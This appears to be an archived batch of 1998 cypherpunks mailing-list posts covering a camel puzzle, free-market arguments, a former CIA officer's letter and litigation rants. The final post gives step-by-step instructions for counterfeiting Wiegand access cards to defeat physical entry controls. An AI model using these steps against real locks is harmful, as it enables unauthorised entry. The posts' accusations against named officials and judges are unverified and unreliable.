petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 5 Oct 1998 15:36:39 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199810042112.XAA11806@replay.com>
Message-ID: <v04011708b23ed9ea2c4a@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:02 AM -0500 10/5/98, Reeza! wrote:
>At 11:12 PM 10/4/98 +0200, Anonymous wrote:
>>At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
>>>> There is a desert which is 1000 miles across. There is a camel who can
>>carry
>>>> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The
>camel
>>>> has a total of 3000 bananas to begin with. What is the maximum number of
>>>> bananas that the camel can get across to the other side uneaten?
>>>
>>>My camels don't understand/can't eat fractional bananas.
>>
>>Why are bananas quantized in the presense of camels?  Is this
>>a quantum-computing thing?
>>
>
>Are we stipulating that the camel will travel in a straight line?
>Or will it meander a bit, following the path of least resistanct through
>the dunes?

	If the camel is going to meander, following some perceived "path of
least resistence", then could it's back and forths be used as a source of
entropy?
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Mon, 5 Oct 1998 10:26:43 +0800
To: cypherpunks@toad.com
Subject: the camel
Message-ID: <80256694.0053C3EA.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Camels eat first and carry afterwards so stuff a thousand bananas down its
neck and get it to carry 1000 across.  The remaining 1000 are to be left to
ferment to make a delicious drink for the camel handler who has just
persuaded a camel to eat 1000 bananas.



            ___________________________________________________

The information contained in this electronic mail message is confidential.
It is intended solely for the use of the individual or entity to whom it is
addressed and others authorised to receive it.  If the reader of this
message is not the intended recipient, you are hereby notified that any
use, copying, dissemination or disclosure of this information is strictly
prohibited.
            ___________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Mon, 5 Oct 1998 16:03:39 +0800
To: cypherpunks@Algebra.COM
Subject: Canadian RCMP's & government workers lose vacation over Y2K
Message-ID: <36193391.316C57@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.ottawacitizen.com/national/981003/1910271.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 5 Oct 1998 18:19:50 +0800
To: j orlin grabbe <schneier@counterpane.com
Subject: one-time pad
Message-ID: <3619502C.696E@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Orlin  http://www.aci.net/kalliste/ and, of       
course,http://www.aci.net/kalliste/bw1.htm

I got a big kick reading http://www.jya.com/tristrata.htm

Especially,

  While a one-time pad is, in fact, theoretically unbreakable when
used   properly, the details of using it properly make it entirely
unusable    in any modern commercial or military setting. 

And 

  This kind of system was used for the U.S.-Soviet teletype "hot line"  
and it is occasionally used for paper ciphers and spies, but that's   
it.

Codes and Cryptography by Dominic Welsh references on page 126 Sandia's
Gus Simmons as the source of the above.

  (And if users can exchange these keys, why can't they just
exchange     the messages?)

I think the reason is that the users want to exchange keys for messages
to be sent at a later time, perhaps electronically.

But we have to stick to the position.

Does the algorithm pass the Black and White test or not?  No buts.

Let's all hope for settlement of this UNFORTUNATE matter before it
gets WORSE.

bill

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@is9.nyu.edu>
Date: Mon, 5 Oct 1998 12:04:50 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Another question about free-markets... (fwd)
In-Reply-To: <199810051212.HAA02813@einstein.ssz.com>
Message-ID: <3618FDA1.5A8F936A@is9.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Mon, 5 Oct 1998 10:03:25 +0100
> > From: Steve Mynott <stevem@tightrope.demon.co.uk>
> > Subject: Re: Another question about free-markets...
> 
> > On Sun, Oct 04, 1998 at 11:53:28PM -0500, Jim Choate wrote:
> >
> > > Now in a free-market, by definition, there is no law. What then is the
> >
> > no in a free market there is no state
> >
> > there are laws based on natural rights
> 
> Ok, who writes the laws? Who enforces the laws? Who decides what is natural?

Everyone.  Ever heard of common law?

> Remember, we have *NO* participants in a free market other than the producer
> and the consumer. Two, and *only* two, parties are involved.

This is incorrect.

Everyone is involved, in that there is generally more than one producer,
and almost always more than one consumer.  If the general body of
consumers feel that producer X is doing something unethical, or
otherwise badly, they will not do business with that producer --either
for fear of being cheated, or simply because they feel that it would be
morally incorrect to support him.  If it happens that there is only one
producer, then the general sentiment of the consumers will create a
large demand for an alternative supply of whatever producer X produces. 
This generally leads to the diminishment of X's profits, which either
drives him out of business entirely, or forces him to change his ways.

This is how it works in a free market/society.  Of course, if it were a
governed society, producer X would buy up a bloc of politicians, and get
them to either pass laws prohibiting or handicaping his potential
competition, or get them to give him a big fat subsidy, which can be
used to drive competitors out of business.  The net result: everyone is
forced to buy from producer X, even though everyone knows he's slime.

Is the argument any more clear now?

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Mon, 5 Oct 1998 16:16:26 +0800
To: cypherpunks@Algebra.COM
Subject: [Fwd: [Spooks] Letter from a CIA officer with a gripe]
Message-ID: <36193687.2F47ED74@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



To: Spooks <spooks@qth.net>
Subject: [Spooks] Letter from a CIA officer with a gripe
From: Bob Margolis <rttyman@wwa.com>
Date: Sat, 03 Oct 1998 22:30:07 -0500
Reply-To: Bob Margolis <rttyman@wwa.com>
Sender: owner-spooks@qth.net

February 26, 1998

Senator Lauch Faircloth
317 Hard Senate Office Building
United States Senate
Washington, DC 20510

Senator Faircloth:

I am very concerned with recently published reports, which conclude 
that the Central Intelligence Agency was not involved in drug activity 
in connection with their activities in Latin America.

As a former Central Intelligence Agency officer I had direct knowledge 
of matters which may be relevant in this matter.

During the period of January 1986 until July 1990 I was assigned as the 
lead Computer Systems Analyst Programmer to a facility which was 
initially called Project Koral during the building phase in 1985, but 
upon activation was known as BYJURY within the Office of Communications 
(DA/OC) although this designation was later changed to OC/MIAMI. Our 
callsign was KKN39 and our routing indicators was RUEG and RUEGMI. 
Because it operated under the guise of being a U.S. Army facility it 
was also known as the United States Army Regional Communication 
Agency/National Communications System and telegraphically as RRF MIAMI. 
However, at no time did the facility ever support any DOD efforts. The 
primary mission of this facility was to support the activities of the 
Continuity of Government project which was identified by project 
cryptonyms as CHALLIS, FESTIVE, FENCER, FEDDER, PEGASUS and ZEUS and in 
this role the name of the facility was Atlantic Relay Facility I (ARF-
1). The overall umbrella organization for this effort was initially 
known as NEISS, later as NEISO and finally as SIO and at one point had 
space located in the basement of the Tysons Corner mall in Vienna, 
Virginia.

 The facility itself was located on U.S. Government property, which was 
known locally as the Richmond Naval Air Station. This same property was 
also the location of a University of Miami Primate Research Center, a 
Marine Corps Reserve unit, the Central Intelligence Facility and 
another NEISO activity which was identified as a unit of the U.S. Army 
7th Signal Corps but which was known with NEISO as CPIC-East.

The OC/MIAMI facility was staffed with approximately 15 people. A 
facility manager, a senior watch officer, a station engineer, a 
programmer analyst, three electronic technicians, an administrative 
assistant and 7 communications officers. Because the activities in 
support of the NEISO operations was minimal in peacetime, the facility 
was used by the Office of Communications as a major relay to provide 
linkages between several CIA facilities in Southern Florida (LA/MIAMI, 
FR/MIAMI, Miatech, FBIS Key West) and several other sites in the 
Caribbean and South America. In addition we also periodically provided 
telecommunications service to other CIA facilities whose primary relay 
was the Office of Communications relay facility near Culpepper, 
Virginia which was known for years as YOGURT but was later known as 
BYJAMS and still later as OC/BRANDY with a callsign of KKN50 and a 
routing indicator of RUES.

By now I hope you realize that I did have access to the information 
which I am about to convey. The information given above can be verified 
by the CIA, although they will be extremely reluctant to do so since 
the extent of the NEISO project was withheld from Congress

About a 18 months after my arrival at the facility we were informed 
that we would be the primary relay facility for a small station which 
was established on Swan Island in support of a variety of operations 
which were being conducted as part of our support for the CIA's efforts 
in Nicaragua. This facility was centered on an airstrip, which was used 
as a base of operations for pilots who were dropping supplies to the 
rebels, which the CIA was supporting.

The communications setup for this facility was something that we called 
a flyaway package. Basically it consisted of a HF transmitter/receiver 
a PC-based communications terminal and a KG-84 encryption device.

The KG-84 was considered to be one of the most secure cryptographic 
devices in use at that time. It came into universal use by the CIA 
after it became known that the Walker's had compromised the KW-7 in 
1985. When the encrypted signal was received at BYJURY, it was 
decrypted through one of our KG-84 devices and from there the signal 
was passed to the SPARS message switch in unencrypted form. However, 
much of the traffic, which was transmitted on this circuit, was super-
enciphered with One-Time-Tape (OTT). This was extremely unusual under 
the circumstances since electronic encryption was considered quite 
adequate for secure CIA communications. I know from personal experience 
as a communications officer prior to becoming a computer programmer 
that except for annual exercises to maintain proficiency in one-time-
tape techniques, there was essentially no usage of one-time-tape for 
circuits which had secure communications circuitry. The fact that this 
particular station was using one-time-tape over a secure circuit was 
noted by all of the communicators at BYJURY and while we did not have 
any means whereby to decipher the messages further, it was broadly 
speculated that there was something happening on Swan Island which was 
so sensitive that it could not be entrusted to normal electronic 
encryption. When you consider that most Talent Keyhole and Rapport data 
was only afforded normal encryption, the volume of one-time-tape usage 
by this station can only be viewed as extremely noteworthy.

If Congress decides to investigate this matter further, I also need to 
add that the CIA will probably state that the messages, which were 
transmitted to and receive from this station are no longer held. This 
is totally inaccurate. All message traffic into and out of CIA 
Headquarters is held in local storage for several weeks and after that 
time is no longer routinely available. However, for many years now 
there have been backup copies of the traffic which are transmitted on a 
daily basis to an off-site storage facility at Station A of the 
Warrenton Training Center where it is transferred to magnetic tape for 
permanent archives. It is highly likely that the CIA will deny that 
this archiving takes place because even the head of the Office of 
Communications probably does not realize that this is occurring since 
this is considered a low-level routine administrative task and quite 
often CIA managers above the GS-14 level simply do not have any 
understanding or knowledge of the actual working of the communications 
network. If the CIA does deny that the archiving occurs you may wish to 
use the power of congress to pursue the matter until they admit that 
the records do exist. While the actual magnetic tapes may have been 
replaced by more permanent storage such as CDROMS, I can pretty much 
assure you that the storage does exist.

I am providing this information because after the extremely harsh and 
discriminatory treatment, which I experienced during the period of 
1989-1992, I no longer feel any sense of loyalty to the CIA nor do I 
feel that I have any obligations to them. They were wrong in treating 
me the way that they did and demonstrated that they preferred to take 
the word of a senior manager who habitually drank alcohol while 
performing in his position and they preferred to protect those who were 
engaged in sexual improprieties. On top of that they also manipulated 
the federal court system to ensure that they received decisions which 
favored their point of view. There are apparently several federal 
judges and U.S. Attorney's who have profited enormously by making 
decisions, which prevented my case from ever being adequately heard in 
court.

If congress is interested I could also provide information which would 
tend to indicate that senior officials within the Office of 
Communications engaged in misuse of government funds and in which 
official books were manipulated to make it look as if money was being 
spent for official purposes when, in fact, it was being spent for the 
benefit of senior managers in a fraudulent and wasteful manner.

After all of these years I still remain angry over the treatment I 
received. When I became a government employee I fully intended to serve 
an entire career in government service, but when I was faced with 
treatment which was so harsh, punitive and discriminatory and when all 
recourse was denied to me by the so-called statutory Inspector-General 
of the CIA and his minions, I was placed in a position in which I had 
to leave government service for my own protection since I could no 
longer predict the capricious actions by those who held the power to 
make the live of an employee miserable. They were wrong in what they 
did and there is simply no excuse for permitting managers to have such 
power to destroy a human being. I can never forgive their actions and 
at this point the only way that I can deal with my anger is to 
communicate exact details of matters which I experienced as an employee 
in hopes that I can bring shame to the Agency. As a human being I 
deserved a certain level of dignity and I received none. Government 
agencies should be held to a standard whereby no employee is 
discriminated against for any reason.

Please contact me if any additional information is needed on this 
subject. All information in this letter is in the public domain and may 
be disseminated freely.






Kenneth C Stahl

---
Submissions should be sent to spooks@qth.net
To unsubscribe, send "unsubscribe spooks" to majordomo@qth.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Mon, 5 Oct 1998 04:08:52 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199810042112.XAA11806@replay.com>
Message-ID: <3.0.5.32.19981005190213.00845510@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 11:12 PM 10/4/98 +0200, Anonymous wrote:
>At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
>>> There is a desert which is 1000 miles across. There is a camel who can
>carry
>>> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The
camel
>>> has a total of 3000 bananas to begin with. What is the maximum number of
>>> bananas that the camel can get across to the other side uneaten?
>>
>>My camels don't understand/can't eat fractional bananas.
>
>Why are bananas quantized in the presense of camels?  Is this
>a quantum-computing thing?
>

Are we stipulating that the camel will travel in a straight line?
Or will it meander a bit, following the path of least resistanct through
the dunes?

Reeza!

	
"I'm desperately trying to figure out why kamikaze pilots wore helmets."
						- Dave Edison




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 5 Oct 1998 20:47:03 +0800
To: ukcrypto@maillist.ox.ac.uk
Subject: keep up-wind - you think we are KIDDING?
Message-ID: <36197418.19E5@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Subject: 
        Effects of Nukes
  Date: 
        Mon, 05 Oct 1998 09:47:43 -0600
  From: 
        bill payne <billp@nmol.com>
    To:    gap@igc.apc.org, tom carpenter - halcyon
<tomcgap@halcyon.com>,
        jeff debonis <76554.133@compuserve.com>,
lawya@lucs-01.novell.leeds.ac.uk,
        senatorlott@lott.senate.gov, senator_leahy@leahy.senate.gov,
conrad_burns@burns.senate.gov,
        larry_craig@craig.senate.gov, senator@wyden.senate.gov,
dpcintrn@osd.pentagon.mil,
        conrad_burns@burns.senate.gov, senator_gorton@gorton.senate.gov,
senatorlott@lott.senate.gov,
        john_ashcroft@ashcroft.senate.gov, michigan@abraham.senate.gov,
sam.brownback@.senate.gov,
        senator@dorgan.senate.gov, senator_stevens@stevens.senate.gov,
senator@hutchison.senate.gov,
        olympia@snowe.senate.gov, senator@hollings.senate.gov,
senator@inouye.senate.gov,
        wendell_ford@ford.senate.gov, senator@rockefeller.senate.gov,
john_kerry@kerry.senate.gov,
        senator@breaux.senate.gov, senator@bryan.senate.gov,
HERBERT.RICHARDSON@hq.doe.gov,
        BILL.RICHARDSON@HQ.DOE.GOV, pcassel@rt66.com, gregh@scene.com
    CC: 
        senator@wellstone.senate.gov, jy@jya.com,
senator_mccain@mccain.senate.gov,
        grassley <chuck_grassley@grassley.senate.gov>, cynthia mckinney
<CYMCK@mail.house.gov>,
        c paul robinson <cprobin@sandia.gov>, art morales
<armoral@sandia.gov>, cypherpunks@toad.com,
        ukcrypto@maillist.ox.ac.uk


Monday 10/5/98 7:01 AM

Tom Carpenter http://www.whistleblower.org/

I hope your week-end conference went well.

I think I will in Pullman in a few weeks.  And, therefore, almost a
DOWNWINDER.

When I was a prof at Washington State University 1966-79 we traveled to
Spokane.

I always wondered why I saw so many sick kids in Spokane.  

I think we all now know a possible reason.

Albuquerque Journal Sunday 10/4/98

Heath Effects of Nuke Sites Targeted

DOE's Richardson
to Review Reports

The Associated Press

DENVER - U.S. Energy Secr-
ary Bill Richardson says he will
investigate reports of health prob-
lems among people living near or
working at federal nuclear weapons.
plants and research facilities in 11
states.

  A total of 410 people told a news-
per, The Tennessean, they are
suffering from unexplained illness-
including tremors, memory toss,
fatigue and a variety of breathing,
muscular and reproductive prob-
lems. Their doctors cannot explain
why they are sick.

  No direct link has been estab-
lished between the illnesses and the

  "I want to be absolutety
  sure we're erring on the
  side of making sure there
  are no problems."

  U.S.  ENERGY SECRETARY
         BILL RICHARDSON

  Department of Energy sites. But
doctors, scientists and lawmakers
say it's large enough to warrant a
comprehensive study to try to find
the cause.

"My views we ought to get to the
bottom of this," Richardson told the
newspaper after meeting Friday
with residents near the Rocky Flats 
nuclear site in Denver. "I want to be
absolutely sure we're erring on the
side of making sure there are no
problems."

  Scientists have been concerned
for decades about radiation from
nuclear production and its link to
cancer But no one has ever looked
into noncancerous illnesses.

  During a 22-month investigation,
the newspaper found ill people at 13
DOE sites in Tennessee, Colorado,
South Carolina, New Mexico, Idaho,
New York, California, Ohio, Ken-
tucky, Texas and Washington.

  The Energy Department had ear-
lier said it does not plan to take a
comprehensive look at the issue.

http://www.tennessean.com/special/oakridge/part3/index.shtml

Here is some other relevant information about the U.S. goverment,
Department of Energy, and nukes from Wierd History 101  by  
John Richard Stephens
http://www.thegrid.net/fern.canyon/weird/contents.htm

[A]nd then there are the legitimate concerns of
terrorists using nuclear weapons. This risk is
emphasized by the many incidents where the
smugglers of nuclear components have been
caught. But let's not get into that.
  Ever since the bombs were dropped on
Hiroshima and Nagasaki, people have worried
about having one of these horrors dropped on
them. Since the demise of the Soviet Union, this
threat has become more nebulous, making it a bit
more difficult for people to focus their fears.16 As
a result, their fears have diminished somewhat
even though the threat has probably increased
because of the increase in countries that have the

16  As of 1997, Russia and the United States still had about
seven thousand strategic (or long rang) warheads each.
Roughly half of these could be launched with a few
minutes notice.

bomb and the advances in technology that enable
a bomb to be made from fissionable material the
size of a beer can, while a bomb that can level a
city can now be made to fit into a knapsack. But
during the Cold War, the threat seemed much
more immediate.
  Partly in response to these fears, the govern-
ment implemented programs to teach people how
they could protect themselves in the event of a
nuclear attack. Early efforts downplayed the risks.
One amazing example of this is the pamphlet
Survival Under Atomic Attack. Published by the
U.S. government in 1950, this official booklet
proclaims, "You can SURVIVE. You can live
through an atom bomb raid and you won't have to
have a Geiger counter, protective clothing, or spe-
cial training in order to do it." And then it goes on
to give such advice as, 'After an air burst, wait a
few minutes then go help to fight fires. After
other kinds of bursts wait at least 1 hour to give
lingering radiation some chance to die down."

Discussing the role of the IRS in a nuclear attack,
the Internal Revenue Service Handbook (1976)
says, 

  "During a state of national emergency
  resulting from enemy attack, the essential
  functions of the Service will be as follows: (1)
  assessing, collecting, and recording taxes. . ."

  Where is the Best Place to Go?
  If you live in a State where there is danger
from sudden storms like cyclones or hurricanes,
you may have a "cyclone cellar" or something
similar. If so, you have a shelter that will give
excellent protection against atomic bombs.
  [People soon realized this wasn't quite true,
and they began building bomb shelters.]

  "All you have to do to protect yourself from
  radiation is go down to the bottom of your
  swimming pool and hold your breath."

    -David Miller Department of Energy
      spokesperson

 [S]o there you have it. You're now prepared to
survive nuclear warfare. Think you can handle it?
  Actually, it's very hard to believe that, after five
years of intensively studying the effects of atomic
bombs and radiation at Hiroshima, Nagasaki, and
various tests involving military personnel as
human guinea pigs, the government didn't have a
better idea of the dangers.

  "My fellow Americans. I am pleased to tell you I
  just signed legislation which outlaws Russia
  forever. The bombing begins in five minutes."

  -President Ronald Reagan during a sound
  check for a live radio show, 1984

  [I]n one of the tests in 1953, U.S. soldiers were
placed near the explosion to test how well they
could function after a blast. Sergeant Reason
Warehime was one of fifty soldiers who were in a
trench two miles from ground zero. They wore no
protective gear. "The first thing I saw" he later
reported, "was a real bright light like a flashbulb
going off in my face, but it stayed on. It was so
bright that even with sunglasses on, my hands
over my eyes, and my eyes closed, I could actually
see the bones in my hands. I felt as if someone was
hugging me really tight, and my whole body was
being compressed. All of a sudden, I heard an
awful noise and felt an intensely hot wind blowing
and the ground rocking like an earthquake. The
dust was so thick I could not see the man right
next to me. The air was so hot that it was difficult
to breathe. . . . Since the fireball was directly over
our heads, there is no doubt in my mind that we
were in the 'stem' of the mushroom cloud."
  A voice over a loudspeaker ordered them to
advance toward ground zero. The sandbags along
the top of their trench were on fire. On reaching
a bunker that was just over a mile from ground
zero, they found eight men. "Those guys were
sick as dogs and heaving their guts out," he said.
Soon they began finding spots where the sand had
melted into glass. After reaching the crater, they
turned back and eventually were picked up by
two radiation specialists in full protective gear.
On the way back, Warehime and some of his
companions started throwing up. A few months
later; all of his hair fell out, his teeth began to rot,
and he was diagnosed as sterile. Eventually, he
developed cataracts, lung cancer; his bones
became brittle, and he had to use crutches to get
around. Even though radiation is known to cause
these things, in the  1980s, the Veterans
Administration insisted his problems weren't
caused by this bomb and denied disability to him
and many others like him. An estimated 250,000
military personnel were exposed to radiation in
experiments between 1946 and the 1970s. Many
additional civilians were also used as guinea pigs
in radiation tests. Very few have ever received any
compensation for or assistance with the perma-
nent damage caused to them.
  Warehime was exposed to a forty-three-
kiloton (not megaton) bomb. It turned out to be
almost twice as powerful as the physicists had
calculated it would be and was about twice as
powerful as those used on Hiroshima and
Nagasaki. Its radiation cloud spread across the
nation from Nevada, fogging undeveloped film
as far away as New Jersey.

Morales and I are in the planning stage to put up a web site.

John Young has been encouraging us to do this.

Reason is that we are going after the judges and clerks in the
Tenth circuit who awarded our court wins to Sandia we, in fact,
we won.  Now that John Young got the docket for us.

Also I will be doing a Privacy Act violation defamation lawsuit against
Sandia, DOE, EEOC, Lockheed Martin, AT&T, and named defendants.

We will have several FORUMS.

1 Pro se litigation against the U.S. Federal government
2 Microsoft Assembler mixed-language programming
3 80C32 hardware, Forth high-level and assembler programming.

at least.

John Young started 3. http://jya.com/f86/whpf86.htm

1 and 2 may be compatible.  

Microsoft distributes buggy software while Gates, Paul Allen, and Balmer 
become some of the richest men in the world.

Perhaps, with some legal encouragement, the above three should spend
some of 
their money getting the bugs out of their software.

To kick-off 1 and 2 I am thinking of posting a complaint against
Microsoft for 
having scammed me by not included a 32 bit linker with MASM 6.11 I just
bought.
If we don't settle, of course.  I will check e-mail in a few minutes to
see
how progress to get the 32 bit linker is coming.

Microsoft appears to want me to buy a C compiler or Windows NT  SDK
[software
development kit] to get the 32 bit linker.

With all this scary stuff of effects of nukes, let's hope Rep. McKinney
and Senator
Grassley are making progress to help get NSA to post the requested
documents.
http://jya.com/whpfiles.htm

And, too, let's ALL hope for settlement so that we can move on to other
constructive
projects.  Before things GET WORSE.

Later
bill
Subject: 
        one-time pad
  Date: 
        Mon, 05 Oct 1998 17:06:53 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        j orlin grabbe <kalliste@aci.net>,
conrad_burns@burns.senate.gov, senator_gorton@gorton.senate.gov,
        senatorlott@lott.senate.gov, john_ashcroft@ashcroft.senate.gov,
michigan@abraham.senate.gov,
        sam.brownback@.senate.gov, senator@dorgan.senate.gov,
senator@wyden.senate.gov,
        senator_stevens@stevens.senate.gov,
senator@hutchison.senate.gov, olympia@snowe.senate.gov,
        senator@hollings.senate.gov, senator@inouye.senate.gov,
wendell_ford@ford.senate.gov,
        senator@rockefeller.senate.gov, john_kerry@kerry.senate.gov,
senator@breaux.senate.gov,
        senator@bryan.senate.gov, nmir@usa.net, Info@IranOnline.com,
info@jebhe.org, Mehrdad@Mehrdad.org,
        cypherpunks@toad.com, ukcrypto@maillist.ox.ac.uk,
wpi@wpiran.org, abd@CDT.ORG,
        merata@pearl.sums.ac.ir, dpcintrn@osd.pentagon.mil,
abumujahid@taliban.com,
        schneier@counterpane.com
    CC: 
        jy@jya.com, john gilmore <gnu@toad.com>, Emile Zola
<ezola@lfcity.com>, lennon@email.nist.gov,
        itl-bulletin@nist.gov


Orlin  http://www.aci.net/kalliste/ and, of       
course,http://www.aci.net/kalliste/bw1.htm

I got a big kick reading http://www.jya.com/tristrata.htm

Especially,

  While a one-time pad is, in fact, theoretically unbreakable when
used   properly, the details of using it properly make it entirely
unusable    in any modern commercial or military setting. 

And 

  This kind of system was used for the U.S.-Soviet teletype "hot line"  
and it is occasionally used for paper ciphers and spies, but that's   
it.

Codes and Cryptography by Dominic Welsh references on page 126 Sandia's
Gus Simmons as the source of the above.

  (And if users can exchange these keys, why can't they just
exchange     the messages?)

I think the reason is that the users want to exchange keys for messages
to be sent at a later time, perhaps electronically.

But we have to stick to the position.

Does the algorithm pass the Black and White test or not?  No buts.

Let's all hope for settlement of this UNFORTUNATE matter before it
gets WORSE.

bill
---
laszlo http://www.qainfo.se/~lb/crypto_ag.htm

Sayonara

1 crypto ag
2 wiegand wires

There are some good business opportunities.  If we live that long.

WE believe that the OTHER SIDE is NOT happy about what happened.

NSA Hoe Cryptogate /JI  October 5, 1998  http://www.jya.com/crypto.htm


---
 False Security  
  
		        William H. Payne	  
                                     
  			Abstract  
  
"Why 130 million Wiegand cards are in use throughout the world .  
  
The most secure of all access card technologies.  
  
HID Wiegand cards are virtually impossible to counterfeit... any attempt
to   
alter them destroys them! ...  
  
Since no direct contact with the card is required, they are totally
enclosed,  
making them absolutely immune to the elements and a frustration of  
vandals. ...   
  
     	The secrets to the security of an  
  	HID Wiegand card are those little  
      	enclosed wire strips. Once corrupted,  
  	they won't work."  
  
Access Control & SECURITY SYSTEMS INTEGRATION, September 1998  
www.prox.com  http/www.securitysolutions.com 
http://www.securitysolutions.com/  
  
*** Bullshit.*** False! - in the EDITED edition, of course  
  
	Fumble, Bumble and Inept Funds Electronic Lock Breaking at  
	Sandia National Laboratories.  
  
Zola http://zolatimes.com/  
  
Would this be worth some bucks?  
  
Want another FUN article?   
  
http://www.zolatimes.com/v2.29/bw1.html  
http://www.aci.net/kalliste/bw1  
  
I would need a BRILLIANT EDITOR to help polish  
the ms.  http://www.aci.net/kalliste/


Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
